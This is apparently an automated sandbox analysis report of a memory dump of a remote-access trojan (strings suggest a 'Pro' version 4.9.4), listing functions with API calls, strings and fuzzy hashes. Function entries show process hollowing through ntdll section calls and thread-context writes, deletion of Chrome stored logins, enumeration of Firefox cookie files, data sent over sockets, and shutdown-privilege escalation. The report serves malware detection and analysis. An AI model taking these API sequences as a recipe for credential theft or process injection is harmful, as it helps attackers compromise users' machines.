                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                    • String ID:
                                    • API String ID: 3587775597-0
                                    • Opcode ID: 23e486b81d5319d6976a5705641320cfcad202a7a3e49a3714ee4dfbb4f6799a
                                    • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                    • Opcode Fuzzy Hash: 23e486b81d5319d6976a5705641320cfcad202a7a3e49a3714ee4dfbb4f6799a
                                    • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00452610 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                    • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                    • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                    • String ID: lJD$lJD$lJD
                                    • API String ID: 745075371-479184356
                                    • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                    • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                    • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                    • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                    • FindClose.KERNEL32(00000000), ref: 0040C47D
                                    • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFile$FirstNext
                                    • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                    • API String ID: 1164774033-405221262
                                    • Opcode ID: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
                                    • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                    • Opcode Fuzzy Hash: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
                                    • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C38E
                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C39B
                                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                                    • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C3BC
                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                                    • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3E2
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                    • String ID:
                                    • API String ID: 2341273852-0
                                    • Opcode ID: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                                    • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                    • Opcode Fuzzy Hash: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                                    • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00419AF5 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Find$CreateFirstNext
                                    • String ID: 8SG$PXG$PXG$NG$PG
                                    • API String ID: 341183262-3812160132
                                    • Opcode ID: 82314eeff241e38e25ba769843facc622900e81eecec2918aec2115619fdd9a6
                                    • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                    • Opcode Fuzzy Hash: 82314eeff241e38e25ba769843facc622900e81eecec2918aec2115619fdd9a6
                                    • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                      • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                      • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                      • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                      • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                    • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                    • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                                    • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                    • String ID: !D@$PowrProf.dll$SetSuspendState
                                    • API String ID: 1589313981-2876530381
                                    • Opcode ID: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
                                    • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                    • Opcode Fuzzy Hash: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
                                    • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0045243C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                    • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                    • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID: ACP$OCP$['E
                                    • API String ID: 2299586839-2532616801
                                    • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                    • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                    • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                    • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                    • GetLastError.KERNEL32 ref: 0040BA58
                                    Strings
                                    • UserProfile, xrefs: 0040BA1E
                                    • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                    • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                    • [Chrome StoredLogins not found], xrefs: 0040BA72
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteErrorFileLast
                                    • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    • API String ID: 2018770650-1062637481
                                    • Opcode ID: 0e718a6ebf02f44b4289ad564225df6632aa7359f7d3b59aeb067c3ad082f2b5
                                    • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                    • Opcode Fuzzy Hash: 0e718a6ebf02f44b4289ad564225df6632aa7359f7d3b59aeb067c3ad082f2b5
                                    • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                    • GetLastError.KERNEL32 ref: 0041799D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                    • String ID: SeShutdownPrivilege
                                    • API String ID: 3534403312-3733053543
                                    • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                    • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                    • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                    • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00409258
                                      • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                    • FindClose.KERNEL32(00000000), ref: 004093C1
                                      • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                      • Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
                                      • Part of subcall function 00404E26: FindCloseChangeNotification.KERNELBASE(?), ref: 00404E4C
                                    • FindClose.KERNEL32(00000000), ref: 004095B9
                                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
                                    • String ID:
                                    • API String ID: 2435342581-0
                                    • Opcode ID: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
                                    • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                    • Opcode Fuzzy Hash: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
                                    • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00413549: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 00413569
                                      • Part of subcall function 00413549: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00413587
                                      • Part of subcall function 00413549: RegCloseKey.ADVAPI32(00000000), ref: 00413592
                                    • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                    • ExitProcess.KERNEL32 ref: 0040F8CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseExitOpenProcessQuerySleepValue
                                    • String ID: 4.9.4 Pro$override$pth_unenc
                                    • API String ID: 2281282204-930821335
                                    • Opcode ID: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
                                    • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                    • Opcode Fuzzy Hash: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
                                    • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 0040966A
                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstH_prologNext
                                    • String ID:
                                    • API String ID: 1157919129-0
                                    • Opcode ID: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
                                    • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                    • Opcode Fuzzy Hash: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
                                    • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00408811
                                    • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                    • String ID:
                                    • API String ID: 1771804793-0
                                    • Opcode ID: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                                    • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                    • Opcode Fuzzy Hash: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                                    • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040783C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                    • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileFind$FirstNextsend
                                    • String ID: XPG$XPG
                                    • API String ID: 4113138495-1962359302
                                    • Opcode ID: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
                                    • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                    • Opcode Fuzzy Hash: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
                                    • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                    Download Yara Rule
                                    APIs
                                    • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                      • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                      • Part of subcall function 0041376F: RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                      • Part of subcall function 0041376F: RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateInfoParametersSystemValue
                                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                    • API String ID: 4127273184-3576401099
                                    • Opcode ID: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
                                    • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                    • Opcode Fuzzy Hash: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
                                    • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004461F0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 464COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: PkGNG
                                    • API String ID: 0-263838557
                                    • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                    • Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
                                    • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                    • Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004180EF Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                    • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                    • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                    • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                    • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                    • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                    • ResumeThread.KERNEL32(?), ref: 00418435
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                    • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                    • GetLastError.KERNEL32 ref: 0041847A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                    • API String ID: 4188446516-3035715614
                                    • Opcode ID: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                                    • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                    • Opcode Fuzzy Hash: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                                    • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040D420 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                      • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                      • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
